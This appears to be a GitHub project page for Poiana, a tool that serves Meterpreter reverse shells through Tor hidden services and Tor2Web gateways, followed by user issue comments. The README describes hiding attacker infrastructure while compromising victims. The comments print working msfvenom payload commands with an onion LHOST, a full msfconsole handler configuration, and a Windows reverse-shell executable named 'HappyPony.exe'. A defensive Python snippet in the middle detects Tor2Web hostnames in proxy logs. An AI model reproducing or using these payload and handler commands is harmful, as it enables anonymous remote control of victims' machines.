Meterpreter Reverse shell over TOR network using hidden services

Overview

Poiana

Reverse shell over TOR network using hidden services

Features

-> Create a hidden service

-> Generate non-staged payload (python/meterpreter_reverse_http)

-> Convert the onion URL for Tor2Web: the suffix .ws is appended, so the URL becomes reachable from outside the Tor network

-> Generate batch .rc file for msfconsole

Usage

$ git clone https://github.com/CalfCrusher/Poiana/

$ cd Poiana && pip3 install -r requirements.txt

$ python3 poiana.py

NOTE: You need to edit your torrc file and insert: ControlPort 9151

I didn't want to build this as an automatic 'feature' into the tool because, of course, you need to be root to edit torrc. This way the script can run as a normal user. Remember: do NOT blindly run or trust scripts from others; discovering a backdoor in a fancy script is unfortunately not rare! Always read the source code :)

Be careful if the script fails to delete hidden_service_data for some reason: the script won't start correctly if this directory is already present before the tool runs. I'm trying to fix this behaviour, also because I want to add an (optional) feature for a persistent onion URL, and maybe the option to create an ephemeral hidden service (one that never touches disk).

Why this project?

Reverse shells on hidden services through Tor are sexy

One of the weaknesses of attackers when they exfiltrate compromised information is that they expose part of their technological infrastructure during the process. In this sense, the Tor network offers the possibility of making services on a machine accessible as hidden services, taking advantage of the anonymity it offers and thereby preventing the real location of the machine from being exposed. Using Tor2Web, the victim doesn't need to have Tor or ncat installed: the victim can establish a connection to our hidden service through a Tor2Web gateway. To me it's really an interesting way to pop a reverse shell quite anonymously.

Tor2Web

Tor2web (https://www.tor2web.org) is a software project that allows Tor hidden services to be accessed from a standard browser without being connected to the Tor network. You can find a list of Tor2Web volunteer gateways here: https://www.reddit.com/r/onions/comments/bx19c6/list_of_tor2web_gateways/
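A Tor2Web gateway makes a hidden service reachable under a clearnet suffix (".onion.ws" as the README describes; ".onion.re" also appears in the issue comments on this page), which means the hostname shape itself is a usable detection signal in outbound proxy or DNS logs. The following is an added example, not part of Poiana: it scans constructed proxy log lines for Tor2Web gateway hostnames. The log format, the suffix list beyond .ws and .re, and the onion addresses are assumptions made for the example.

```python
"""Flag requests to Tor2Web gateways in outbound proxy logs.

Added example (not part of the Poiana project). A Tor2Web gateway exposes a
hidden service under a clearnet suffix (".onion.ws" in the README, ".onion.re"
in the issue comments), so a host with no Tor client can still reach it over
plain HTTP(S). On the defender's side that hostname shape is easy to spot in
proxy or DNS logs. The log format, the gateway suffix list and the onion
addresses below are assumptions / constructed for this example.
"""
import re
from typing import Dict, List, Optional
from urllib.parse import urlsplit

# Clearnet suffixes that Tor2Web-style gateways append to a .onion name.
# ".ws" and ".re" appear on this page; the others are assumed.
TOR2WEB_SUFFIXES = ("ws", "re", "to", "link", "ly", "pet", "sh", "city")

# An onion label is base32: 56 chars for v3, 16 chars for v2. Anchoring on the
# label length keeps names like "example.onion.ws" or "notonion.ws" from matching.
_GATEWAY_RE = re.compile(
    r"^(?:[a-z0-9-]+\.)*"                       # optional subdomain labels
    r"(?P<onion>[a-z2-7]{56}|[a-z2-7]{16})"     # v3 or v2 onion label
    r"\.onion\.(?P<gw>" + "|".join(TOR2WEB_SUFFIXES) + r")$",
    re.IGNORECASE,
)


def classify_host(host: str) -> Optional[Dict[str, str]]:
    """Return {'onion', 'gateway'} if host is a Tor2Web gateway name, else None."""
    m = _GATEWAY_RE.match(host.strip().rstrip(".").lower())
    if not m:
        return None
    return {"onion": m.group("onion") + ".onion", "gateway": m.group("gw")}


def scan_proxy_log(lines: List[str]) -> List[Dict[str, str]]:
    """Scan 'timestamp client method url status' lines (assumed format); return hits."""
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) < 5:
            continue                            # malformed line: skip, don't crash
        ts, client, _method, url, status = parts[:5]
        host = urlsplit(url).hostname or ""     # strips scheme, port and path
        info = classify_host(host)
        if info:
            hits.append({"time": ts, "client": client, "host": host,
                         "status": status, **info})
    return hits


# Constructed onion addresses (valid base32 shape, not real services).
V3_ONION = "constructedexampleaddressfortor2webdetection".ljust(56, "a")
V2_ONION = "constructedv2abc"

# Constructed proxy log lines: timestamp client method url status
SAMPLE_LOG = [
    "2024-05-01T09:00:01Z 10.0.0.5 GET http://www.example.com/ 200",
    f"2024-05-01T09:00:02Z 10.0.0.5 GET http://{V3_ONION}.onion.re/ 301",
    f"2024-05-01T09:00:03Z 10.0.0.7 POST https://www.{V2_ONION}.onion.ws:443/x 200",
    "2024-05-01T09:00:04Z 10.0.0.9 GET http://notonion.ws/ 200",
    "2024-05-01T09:00:05Z 10.0.0.9 GET http://example.onion.ws/ 404",
    "broken line",
]

if __name__ == "__main__":
    for h in scan_proxy_log(SAMPLE_LOG):
        print(f"{h['time']} {h['client']} -> {h['onion']} via .{h['gateway']} ({h['status']})")
```

Because the gateway name has to be resolved by the client, `classify_host` can be applied unchanged to query names in DNS logs; a match there shows up even when the HTTP request itself is encrypted.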

Disclaimer

The onion network is NOT 100% bulletproof: https://www.wired.com/2014/12/fbi-metasploit-tor. I made this tool for educational use only. I'm not responsible for the consequences of illegal use. Please understand also that there is no warranty for this free software. Please note also that using Tor2Web is NOT secure from the victim's point of view: the point of Tor is that users can connect without being eavesdropped on, and going through the clearnet (Tor2Web), even with HTTPS, seriously cripples the efforts made to protect users!

Comments
  • AttributeError: 'NoneType' object has no attribute 'hostname'

    please help with this one:

     * Starting tor network..
     * Creating hidden service in /home/kali/Poiana/hidden_service_data
    Traceback (most recent call last):
      File "/home/kali/Poiana/poiana.py", line 141, in
        main()
      File "/home/kali/Poiana/poiana.py", line 136, in main
        stem()
      File "/home/kali/Poiana/poiana.py", line 91, in stem
        if result.hostname:
    AttributeError: 'NoneType' object has no attribute 'hostname'

    opened by jwinns 4
  • [Errno 111] Connection refused

    I'm getting this issue when I try to run the script:

     * Starting tor network..
    Traceback (most recent call last):
      File "/usr/local/lib/python3.10/dist-packages/stem-1.8.0-py3.10.egg/stem/socket.py", line 535, in _make_socket
        control_socket.connect((self.address, self.port))
    ConnectionRefusedError: [Errno 111] Connection refused

    During handling of the above exception, another exception occurred:

    Traceback (most recent call last):
      File "/usr/local/lib/python3.10/dist-packages/stem-1.8.0-py3.10.egg/stem/connection.py", line 1063, in _connection_for_default_port
        return stem.socket.ControlPort(address, 9151)
      File "/usr/local/lib/python3.10/dist-packages/stem-1.8.0-py3.10.egg/stem/socket.py", line 503, in init
        self.connect()
      File "/usr/local/lib/python3.10/dist-packages/stem-1.8.0-py3.10.egg/stem/socket.py", line 172, in connect
        self._socket = self._make_socket()
      File "/usr/local/lib/python3.10/dist-packages/stem-1.8.0-py3.10.egg/stem/socket.py", line 538, in _make_socket
        raise stem.SocketError(exc)
    stem.SocketError: [Errno 111] Connection refused

    During handling of the above exception, another exception occurred:

    Traceback (most recent call last):
      File "/home/kali/Poiana/poiana.py", line 143, in
        main()
      File "/home/kali/Poiana/poiana.py", line 138, in main
        stem()
      File "/home/kali/Poiana/poiana.py", line 76, in stem
        with Controller.from_port() as controller:
      File "/usr/local/lib/python3.10/dist-packages/stem-1.8.0-py3.10.egg/stem/control.py", line 1031, in from_port
        control_port = stem.connection._connection_for_default_port(address)
      File "/usr/local/lib/python3.10/dist-packages/stem-1.8.0-py3.10.egg/stem/connection.py", line 1065, in _connection_for_default_port
        raise exc
      File "/usr/local/lib/python3.10/dist-packages/stem-1.8.0-py3.10.egg/stem/connection.py", line 1060, in _connection_for_default_port
        return stem.socket.ControlPort(address, 9051)
      File "/usr/local/lib/python3.10/dist-packages/stem-1.8.0-py3.10.egg/stem/socket.py", line 503, in init
        self.connect()
      File "/usr/local/lib/python3.10/dist-packages/stem-1.8.0-py3.10.egg/stem/socket.py", line 172, in connect
        self._socket = self._make_socket()
      File "/usr/local/lib/python3.10/dist-packages/stem-1.8.0-py3.10.egg/stem/socket.py", line 538, in _make_socket
        raise stem.SocketError(exc)
    stem.SocketError: [Errno 111] Connection refused

    opened by tavgar 3
  • AttributeError: 'NoneType' object has no attribute 'hostname'

     * Starting tor network..
     * Creating hidden service in /home/ubuntu/Poiana/hidden_service_data
    Traceback (most recent call last):
      File "poiana.py", line 141, in
        main()
      File "poiana.py", line 136, in main
        stem()
      File "poiana.py", line 91, in stem
        if result.hostname:
    AttributeError: 'NoneType' object has no attribute 'hostname'

    opened by Deathpoolxrs 0
  • Manual process

    Can you explain the manual process of your script? It seems that I am unable to connect back to the Tor hidden service msfconsole, no matter what I try. Can you check the following config and verify you can connect with the same config?

    • Create a hidden service domain name with the following addition in torrc

    HiddenServiceDir /home/kali/tor_hidden_service/
    HiddenServicePort 80 127.0.0.1:5000

    • Generate a python stageless http payload, and add ".re" at the end of LHOST (hidden service domain)

    msfvenom -f raw -p python/meterpreter_reverse_http LHOST=do5npekqive7vbeiq3g4enf4qnxmvslcybpslfe63ijodw5tbbvoqzqd.onion.re LPORT=80 > payload_not_clean.py

    • Start msfconsole with the following options

    use exploit/multi/handler
    set payload python/meterpreter_reverse_http
    set lport 5000
    set lhost 127.0.0.1
    set exitonsession false
    set sessioncommunicationtimeout 0
    set sessionexpirationtimeout 0
    exploit -j -z

    After debugging my payload with Wireshark, I can see that there is a 301 redirect to HTTPS, resulting in a "bad request".

    Any suggestions?

    opened by analyserdmz 1
  • Just a quick question

    Hi,

    Awesome repo. What other payloads can be used with this?

    I tried it out in my lab, and it works with the python payload; however, I tried changing the listener as well as the msfvenom payload to a Windows stageless payload and it doesn't seem to work.

    f.write("set PAYLOAD windows/meterpreter_reverse_tcp\n")

    payload = "msfvenom -p windows/shell_reverse_tcp LHOST=" + lhost + " LPORT=80 -f exe > HappyPony.exe"

    opened by ejawhary 1